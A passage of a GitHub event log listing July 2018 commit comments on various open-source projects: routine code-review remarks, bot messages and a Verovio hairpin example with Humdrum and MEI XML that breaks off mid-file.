{"id":"7922080158","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"neorusse/Pixel-Art-Maker-Project"},"payload":{"comment":{"id":29603865,"position":null,"line":null,"path":null,"commit_id":"8e3fa3a555901b434f9cb9f6cfd379c6ca891265","created_at":"2018-07-05T09:37:41Z","updated_at":"2018-07-05T09:37:41Z","author_association":"NONE","body":"Thats cool. \r\n\r\nSee you at the top"}},"created_at":"2018-07-05T09:37:41Z"}
{"id":"7922081179","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603867,"position":45,"line":2547,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:37:53Z","updated_at":"2018-07-05T09:37:53Z","author_association":"CONTRIBUTOR","body":"Move this main() into a unit test and replace all System.out.println by log.debug."}},"created_at":"2018-07-05T09:37:53Z"}
{"id":"7922082910","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29603870,"position":15,"line":654,"path":"src/LLVM_Runtime_Linker.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-05T09:38:12Z","updated_at":"2018-07-05T09:38:12Z","author_association":"COLLABORATOR","body":"The default_cache_allocator is needed right now to resolve the symbol halide_hexagon_free_l2_pool() in hexagon_dma.cpp for target host. "}},"created_at":"2018-07-05T09:38:12Z"}
{"id":"7922089465","type":"CommitCommentEvent","actor":{"login":"lovedeepSangha"},"repo":{"name":"lovedeepSangha/algorithms"},"payload":{"comment":{"id":29603883,"position":null,"line":null,"path":null,"commit_id":"bd1e9b3b3c524ee1b641d5ccd9729cdaab598e0d","created_at":"2018-07-05T09:39:24Z","updated_at":"2018-07-05T09:39:24Z","author_association":"OWNER","body":"koi na"}},"created_at":"2018-07-05T09:39:24Z"}
{"id":"7922091523","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29603885,"position":null,"line":null,"path":null,"commit_id":"50c11fd1b7324044d0fd599f5581b68b32a95e54","created_at":"2018-07-05T09:39:47Z","updated_at":"2018-07-05T09:39:47Z","author_association":"NONE","body":"Markus Hilbert your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-05T09:39:47Z"}
{"id":"7922092958","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603895,"position":218,"line":130,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:40:03Z","updated_at":"2018-07-05T09:40:03Z","author_association":"NONE","body":"$this->text не объявлен"}},"created_at":"2018-07-05T09:40:03Z"}
{"id":"7922093353","type":"CommitCommentEvent","actor":{"login":"xvik"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29603897,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T09:40:08Z","updated_at":"2018-07-05T09:40:08Z","author_association":"OWNER","body":"Yes, I saw that lazy properties were added recently, but it's always better to wait for a few more versions until new api become stable. And from the user perspective, new api usage means the rise of required gradle version for the plugin. \r\nMaybe I'll start using them in the new plugin and eventually migrate all others.\r\n\r\nAs for finals, I don't like the idea of making configuration property final.. it's a break of expectations. I would rather remove initial initialization and deal with nulls instead."}},"created_at":"2018-07-05T09:40:08Z"}
{"id":"7922097133","type":"CommitCommentEvent","actor":{"login":"mennodekker"},"repo":{"name":"GemsTracker/gemstracker-library"},"payload":{"comment":{"id":29603899,"position":450,"line":172,"path":"classes/Gems/Default/GroupAction.php","commit_id":"4d1c4684c8fa3b8c108f2eee51cd967d4f1ac96e","created_at":"2018-07-05T09:40:50Z","updated_at":"2018-07-05T09:40:50Z","author_association":"MEMBER","body":"Translation here"}},"created_at":"2018-07-05T09:40:50Z"}
{"id":"7922101201","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29603907,"position":30,"line":249,"path":"lib/email/receiver.rb","commit_id":"28dd7fb56231938141635cc08285368c8239bd6a","created_at":"2018-07-05T09:41:37Z","updated_at":"2018-07-05T09:41:37Z","author_association":"CONTRIBUTOR","body":"What I don't get here... why do we have a site setting for spam headers ... and then hardcode the headers we check here?"}},"created_at":"2018-07-05T09:41:37Z"}
{"id":"7922104996","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603919,"position":45,"line":2547,"path":"domain-models-runtime/src/main/java/org/folio/rest/persist/PostgresClient.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:42:20Z","updated_at":"2018-07-05T09:42:20Z","author_association":"CONTRIBUTOR","body":"OK, has been removed by some unrelated commit"}},"created_at":"2018-07-05T09:42:20Z"}
{"id":"7922107918","type":"CommitCommentEvent","actor":{"login":"atallahade"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29603930,"position":7,"line":346,"path":"xwiki-platform-core/xwiki-platform-appwithinminutes/xwiki-platform-appwithinminutes-ui/src/main/resources/AppWithinMinutes/ClassEditSheet.xml","commit_id":"8fc372b427aba66badd60043fb16117678f8ff5f","created_at":"2018-07-05T09:42:54Z","updated_at":"2018-07-05T09:42:54Z","author_association":"CONTRIBUTOR","body":"I think this should be more generic as the AWM is not the only place where a CSS file is not loaded.\r\nFor instance, if you create a page and add the object `AppWithinMinutes.Users`, you'll end up with a missing CSS file.\r\nI've made a PR to fix this problem, you can see the commit here: https://github.com/xwiki/xwiki-platform/pull/754/commits/7c8aabf956e4d76107bf33bb56d17e6b735dad39"}},"created_at":"2018-07-05T09:42:54Z"}
{"id":"7922110661","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603935,"position":294,"line":170,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:43:26Z","updated_at":"2018-07-05T09:43:26Z","author_association":"NONE","body":"Называй методы короче - getName"}},"created_at":"2018-07-05T09:43:26Z"}
{"id":"7922116179","type":"CommitCommentEvent","actor":{"login":"cyberic99"},"repo":{"name":"jean-emmanuel/open-stage-control"},"payload":{"comment":{"id":29603945,"position":5,"line":6,"path":"resources/docs/widgets/matrices.md","commit_id":"0a25e21c29c51363888912bd963a07acdd4dc98c","created_at":"2018-07-05T09:44:29Z","updated_at":"2018-07-05T09:44:29Z","author_association":"CONTRIBUTOR","body":"@jean-emmanuel a s is missing: extra -> extras"}},"created_at":"2018-07-05T09:44:29Z"}
{"id":"7922119258","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603952,"position":14,"line":18,"path":"domain-models-runtime/src/test/java/org/folio/rest/persist/PostgresClientTest.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:45:03Z","updated_at":"2018-07-05T09:45:03Z","author_association":"CONTRIBUTOR","body":"Why do you convert the JUnit5 test to a JUnit4 test?"}},"created_at":"2018-07-05T09:45:03Z"}
{"id":"7922119783","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/occupythetrees.com"},"payload":{"comment":{"id":29603954,"position":null,"line":null,"path":null,"commit_id":"965cd62c4732f867b20d09056b37422c718ddf0e","created_at":"2018-07-05T09:45:10Z","updated_at":"2018-07-05T09:45:10Z","author_association":"OWNER","body":"Added Photo Gallery. Also added Woo Commerce plugin.  "}},"created_at":"2018-07-05T09:45:10Z"}
{"id":"7922120662","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29603955,"position":268,"line":155,"path":"index.php","commit_id":"ede0488353a2f0729dae1d62099ead7d3982eb7e","created_at":"2018-07-05T09:45:18Z","updated_at":"2018-07-05T09:45:18Z","author_association":"NONE","body":"Массив можно объявлять скобками [] - это проще и быстрее"}},"created_at":"2018-07-05T09:45:18Z"}
{"id":"7922121452","type":"CommitCommentEvent","actor":{"login":"Tartariaorg"},"repo":{"name":"Tartariaorg/Grif-2"},"payload":{"comment":{"id":29603957,"position":null,"line":null,"path":null,"commit_id":"c76bf8652d8789c12c5d11a95dfe5dd98e1f4a65","created_at":"2018-07-05T09:45:27Z","updated_at":"2018-07-05T09:45:27Z","author_association":"OWNER","body":"WINDOWS WALLET GRIF"}},"created_at":"2018-07-05T09:45:27Z"}
{"id":"7922125830","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-campaign"},"payload":{"comment":{"id":29603973,"position":78,"line":102,"path":"src/main/java/com/campaign/api/CustomerService.java","commit_id":"95bba48a96ab3c7bbce231b3f49c1ac5eb7ea5b8","created_at":"2018-07-05T09:46:15Z","updated_at":"2018-07-05T09:46:15Z","author_association":"CONTRIBUTOR","body":"Is it guaranteed that token returned by dao will not be null...  Is null check is not required here? "}},"created_at":"2018-07-05T09:46:15Z"}
{"id":"7922126647","type":"CommitCommentEvent","actor":{"login":"pmacko1"},"repo":{"name":"aerogear/mobile-docs"},"payload":{"comment":{"id":29603977,"position":3,"line":32,"path":"modules/ROOT/pages/xamarin/security.adoc","commit_id":"e74c0c8f7993c4d726a5c00fc20ef4032ee0fc72","created_at":"2018-07-05T09:46:25Z","updated_at":"2018-07-05T09:46:25Z","author_association":"CONTRIBUTOR","body":"this adoc is ultimately not published (using-metrics-sdk and this are pointing to each other, neither are referenced in docs(nav.adoc, other adocs)"}},"created_at":"2018-07-05T09:46:25Z"}
{"id":"7922129074","type":"CommitCommentEvent","actor":{"login":"pmacko1"},"repo":{"name":"aerogear/mobile-docs"},"payload":{"comment":{"id":29603983,"position":1,"line":1,"path":"modules/ROOT/pages/xamarin/using-metrics-sdk.adoc","commit_id":"e74c0c8f7993c4d726a5c00fc20ef4032ee0fc72","created_at":"2018-07-05T09:46:53Z","updated_at":"2018-07-05T09:46:53Z","author_association":"CONTRIBUTOR","body":"see comment in security.adoc"}},"created_at":"2018-07-05T09:46:53Z"}
{"id":"7922130919","type":"CommitCommentEvent","actor":{"login":"Jaifroid"},"repo":{"name":"kiwix/kiwix-js"},"payload":{"comment":{"id":29603988,"position":5,"line":196,"path":"www/js/lib/zimfile.js","commit_id":"adda5f9ba9b7dc73908103ff7bea384dc93515ed","created_at":"2018-07-05T09:47:14Z","updated_at":"2018-07-05T09:47:14Z","author_association":"COLLABORATOR","body":"@mossroy Apologies, I should have worked through properly before commenting. I see that here the readSliceSingleThread method merely evokes the plainBlobReader function without passing it through your new code in xzdec_wrapper. So I think no delay is introduced for uncompressed files, and my comments are irrelevant!"}},"created_at":"2018-07-05T09:47:14Z"}
{"id":"7922132869","type":"CommitCommentEvent","actor":{"login":"julianladisch"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":29603991,"position":124,"line":59,"path":"domain-models-runtime/src/test/java/org/folio/rest/persist/PostgresClientTest.java","commit_id":"b82da32f3810827efad592eca1dd08fb1c22e5f5","created_at":"2018-07-05T09:47:35Z","updated_at":"2018-07-05T09:47:35Z","author_association":"CONTRIBUTOR","body":"Why do you convert the parameterized test to a non-parameterized test which removes the test reporting details?"}},"created_at":"2018-07-05T09:47:35Z"}
{"id":"7922134945","type":"CommitCommentEvent","actor":{"login":"Jaifroid"},"repo":{"name":"kiwix/kiwix-js"},"payload":{"comment":{"id":29603992,"position":12,"line":202,"path":"www/js/lib/zimfile.js","commit_id":"adda5f9ba9b7dc73908103ff7bea384dc93515ed","created_at":"2018-07-05T09:47:59Z","updated_at":"2018-07-05T09:47:59Z","author_association":"COLLABORATOR","body":"This comment is irrelevant, see above."}},"created_at":"2018-07-05T09:47:59Z"}
{"id":"7922135841","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29603994,"position":null,"line":null,"path":null,"commit_id":"dee75278daba7450026d02e56e7ea7ca8be7860e","created_at":"2018-07-05T09:48:10Z","updated_at":"2018-07-05T09:48:10Z","author_association":"OWNER","body":"There's obviously some degree of random error visible here. I can try and eliminate that by forcing it to calculate an average of each one, although it would take longer."}},"created_at":"2018-07-05T09:48:10Z"}
{"id":"7922136219","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-campaign"},"payload":{"comment":{"id":29603996,"position":212,"line":291,"path":"src/main/java/com/campaign/api/CustomerService.java","commit_id":"95bba48a96ab3c7bbce231b3f49c1ac5eb7ea5b8","created_at":"2018-07-05T09:48:14Z","updated_at":"2018-07-05T09:48:14Z","author_association":"CONTRIBUTOR","body":"This code is same as line 287... Why we cannot add OR condition "}},"created_at":"2018-07-05T09:48:14Z"}
{"id":"7922139401","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-campaign"},"payload":{"comment":{"id":29604005,"position":175,"line":272,"path":"src/main/java/com/campaign/api/CustomerService.java","commit_id":"95bba48a96ab3c7bbce231b3f49c1ac5eb7ea5b8","created_at":"2018-07-05T09:48:51Z","updated_at":"2018-07-05T09:48:51Z","author_association":"CONTRIBUTOR","body":"Why we are calling DAO  classes in services"}},"created_at":"2018-07-05T09:48:51Z"}
{"id":"7922139928","type":"CommitCommentEvent","actor":{"login":"vathanyoo"},"repo":{"name":"vathanyoo/palmportal"},"payload":{"comment":{"id":29604009,"position":null,"line":null,"path":null,"commit_id":"86f37a61fec92893cc4887afe6ba6a4f29fd3963","created_at":"2018-07-05T09:48:57Z","updated_at":"2018-07-05T09:48:57Z","author_association":"OWNER","body":"Got it."}},"created_at":"2018-07-05T09:48:57Z"}
{"id":"7922144211","type":"CommitCommentEvent","actor":{"login":"ilmirus"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604021,"position":14,"line":8,"path":"compiler/testData/codegen/bytecodeText/coroutines/varValueConflictsWithTableSameSort.kt","commit_id":"f8956b2fc29b984a6d6e6ea0ba42ae7982fdf149","created_at":"2018-07-05T09:49:44Z","updated_at":"2018-07-05T09:49:44Z","author_association":"CONTRIBUTOR","body":"I'd like to see `suspendCoroutineUninterceptedOrReturn` here"}},"created_at":"2018-07-05T09:49:44Z"}
{"id":"7922152829","type":"CommitCommentEvent","actor":{"login":"ilmirus"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604036,"position":15,"line":16,"path":"compiler/testData/codegen/box/coroutines/dispatchResume.kt","commit_id":"bbc56c7fb0cd0fb2d1f5615569f73ade880ae02b","created_at":"2018-07-05T09:51:20Z","updated_at":"2018-07-05T09:51:20Z","author_association":"CONTRIBUTOR","body":"If we use `suspendCoroutineUninterceptedOrReturn{ ... COROUTINE_SUSPENDED}` instead of `suspendCoroutine` will there be behaviour changes?"}},"created_at":"2018-07-05T09:51:20Z"}
{"id":"7922153562","type":"CommitCommentEvent","actor":{"login":"egorpugin"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":29604037,"position":4,"line":261,"path":"src/lstm/network.cpp","commit_id":"d27f5b58f93511f684f05c361fd0ee350fb1cd5d","created_at":"2018-07-05T09:51:28Z","updated_at":"2018-07-05T09:51:28Z","author_association":"CONTRIBUTOR","body":"Break would be nice here.\r\n@stweil "}},"created_at":"2018-07-05T09:51:28Z"}
{"id":"7922155401","type":"CommitCommentEvent","actor":{"login":"jean-emmanuel"},"repo":{"name":"jean-emmanuel/open-stage-control"},"payload":{"comment":{"id":29604042,"position":5,"line":6,"path":"resources/docs/widgets/matrices.md","commit_id":"0a25e21c29c51363888912bd963a07acdd4dc98c","created_at":"2018-07-05T09:51:48Z","updated_at":"2018-07-05T09:51:48Z","author_association":"OWNER","body":"fixed, thank you"}},"created_at":"2018-07-05T09:51:48Z"}
{"id":"7922159638","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29604050,"position":null,"line":null,"path":null,"commit_id":"1ebaa090d80bf0b59308d2c70f5e58dd8da47450","created_at":"2018-07-05T09:52:33Z","updated_at":"2018-07-05T09:52:33Z","author_association":"MEMBER","body":"So it caused something like bus error there or some compiler flag has detected it? Can you CC me there if is possible? Just for learning more :)"}},"created_at":"2018-07-05T09:52:33Z"}
{"id":"7922162937","type":"CommitCommentEvent","actor":{"login":"ilmirus"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604058,"position":54,"line":94,"path":"compiler/testData/codegen/box/coroutines/dispatchResume.kt","commit_id":"bbc56c7fb0cd0fb2d1f5615569f73ade880ae02b","created_at":"2018-07-05T09:53:11Z","updated_at":"2018-07-05T09:53:11Z","author_association":"CONTRIBUTOR","body":"Can we change test without changing the check?"}},"created_at":"2018-07-05T09:53:11Z"}
{"id":"7922171648","type":"CommitCommentEvent","actor":{"login":"cyberliem"},"repo":{"name":"KyberNetwork/reserve-data"},"payload":{"comment":{"id":29604076,"position":266,"line":716,"path":"stat/fetcher.go","commit_id":"ee59ac00345a17aa422eb5c0d91ad589e1fcc2ec","created_at":"2018-07-05T09:54:44Z","updated_at":"2018-07-05T09:54:44Z","author_association":"CONTRIBUTOR","body":"Is this wrong error printing? dbErr is asserted, but it print out err ? "}},"created_at":"2018-07-05T09:54:44Z"}
{"id":"7922171823","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29604077,"position":null,"line":null,"path":null,"commit_id":"cc352b6aff7b7ac1667972e7ab530da1818bbbcd","created_at":"2018-07-05T09:54:46Z","updated_at":"2018-07-05T09:54:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-32](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-05T09:54:46Z"}
{"id":"7922174380","type":"CommitCommentEvent","actor":{"login":"stweil"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":29604080,"position":4,"line":261,"path":"src/lstm/network.cpp","commit_id":"d27f5b58f93511f684f05c361fd0ee350fb1cd5d","created_at":"2018-07-05T09:55:14Z","updated_at":"2018-07-05T09:55:14Z","author_association":"CONTRIBUTOR","body":"Even for the default case? It would not have any effect (only a cosmetic one)."}},"created_at":"2018-07-05T09:55:14Z"}
{"id":"7922177838","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604087,"position":14,"line":8,"path":"compiler/testData/codegen/bytecodeText/coroutines/varValueConflictsWithTableSameSort.kt","commit_id":"f8956b2fc29b984a6d6e6ea0ba42ae7982fdf149","created_at":"2018-07-05T09:55:49Z","updated_at":"2018-07-05T09:55:49Z","author_association":"MEMBER","body":"But why? This test is about what happens in `box` function\r\n"}},"created_at":"2018-07-05T09:55:49Z"}
{"id":"7922181443","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29604092,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-05T09:56:29Z","updated_at":"2018-07-05T09:56:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T09:56:29Z"}
{"id":"7922189742","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604107,"position":75,"line":873,"path":"modules/Correlators.cpp","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T09:58:02Z","updated_at":"2018-07-05T09:58:02Z","author_association":"COLLABORATOR","body":"@martin-ueding @maowerner could we check there the \"2\" comes from?"}},"created_at":"2018-07-05T09:58:02Z"}
{"id":"7922191291","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604111,"position":280,"line":978,"path":"modules/Correlators.cpp","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T09:58:20Z","updated_at":"2018-07-05T09:58:20Z","author_association":"COLLABORATOR","body":"@maowerner @martin-ueding Could we check where the \"3\" comes from?"}},"created_at":"2018-07-05T09:58:20Z"}
{"id":"7922194864","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29604117,"position":null,"line":null,"path":null,"commit_id":"f67910a11f4a09ad41e04510d050678643132797","created_at":"2018-07-05T09:59:01Z","updated_at":"2018-07-05T09:59:01Z","author_association":"CONTRIBUTOR","body":"This is an implentation for issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/127 for adding refined control of the timestamp used for the ending point of a hairpin in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n<img width=\"555\" alt=\"screen shot 2018-07-05 at 11 49 27 am\" src=\"https://user-images.githubusercontent.com/3487289/42316471-37c07452-804a-11e8-908b-41a833016ded.png\">\r\n\r\nIn the first and third measures, the endpoint of the hairpins is on the last note of the measure.   For the second and fourth measures, the endpoint of the hairpins is the at the last note of the measure plus the duration of the data line on which the hairpin ends.  This allows hairpins to extend to the ends of measures rather than to the last note of a measure.\r\n\r\nHumdrum input:\r\n\r\n```\r\n**kern\t**kern\t**dynam\r\n*clefG2\t*clefG2\t*\r\n16dn' 16a'LL\t8ffn 8fffn\t<\r\n16d' 16a'JJ\t.\t[\r\n=\t=\t=\r\n16dn' 16a'LL\t8ffn 8fffn\t<\r\n16d' 16a'JJ\t.\t[[\r\n=||\t=||\t=||\r\n16dn' 16a'LL\t8ffn 8fffn\t>\r\n16d' 16a'JJ\t.\t]\r\n=\t=\t=\r\n16dn' 16a'LL\t8ffn 8fffn\t>\r\n16d' 16a'JJ\t.\t]]\r\n=||\t=||\t=||\r\n*-\t*-\t*-\r\n```\r\n\r\nMEI output:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-05T11:57:07\" version=\"2.0.0-dev-2835028-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001717574398\">\r\n                <score xml:id=\"score-0000000797724212\">\r\n                    <scoreDef xml:id=\"scoredef-0000000257565129\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001347967081\" symbol=\"brace\" barthru=\"true\">\r\n                            <staffDef xml:id=\"staffdef-0000000847676722\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000855865365\" />\r\n                            </staffDef>\r\n                            <staffDef xml:id=\"staffdef-0000000129801746\" clef.shape=\"G\" clef.line=\"2\" n=\"2\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-0000000610422863\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000001230066091\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F2N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L3F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L3F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L3F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L3F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L3F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-0000002043205415\" n=\"2\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L3F1-L4F1\">\r\n                                        <chord xml:id=\"chord-L3F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L3F1S1\" oct=\"4\" pname=\"d\">\r\n                                                <accid xml:id=\"accid-L3F1S1\" accid=\"n\" func=\"caution\" />\r\n                                            </note>\r\n                                            <note xml:id=\"note-L3F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L3F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L4F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L4F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L4F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L4F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                            <hairpin xml:id=\"hairpin-L3F3\" staff=\"1\" tstamp=\"1.000000\" tstamp2=\"0m+1.2\" form=\"cres\" vgrp=\"100\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L5\" right=\"dbl\">\r\n                            <staff xml:id=\"staff-L5F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F2N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L6F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L6F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L6F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L6F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L6F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L6F1-L7F1\">\r\n                                        <chord xml:id=\"chord-L6F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L6F1S1\" oct=\"4\" pname=\"d\">\r\n                                                <accid xml:id=\"accid-L6F1S1\" accid=\"n\" func=\"caution\" />\r\n                                            </note>\r\n                                            <note xml:id=\"note-L6F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L6F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L7F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L7F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L7F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L7F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                            <hairpin xml:id=\"hairpin-L6F3\" staff=\"1\" tstamp=\"1.000000\" tstamp2=\"0m+1.2\" form=\"cres\" vgrp=\"100\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L8\">\r\n                            <staff xml:id=\"staff-L8F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L8F2N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L9F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L9F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid 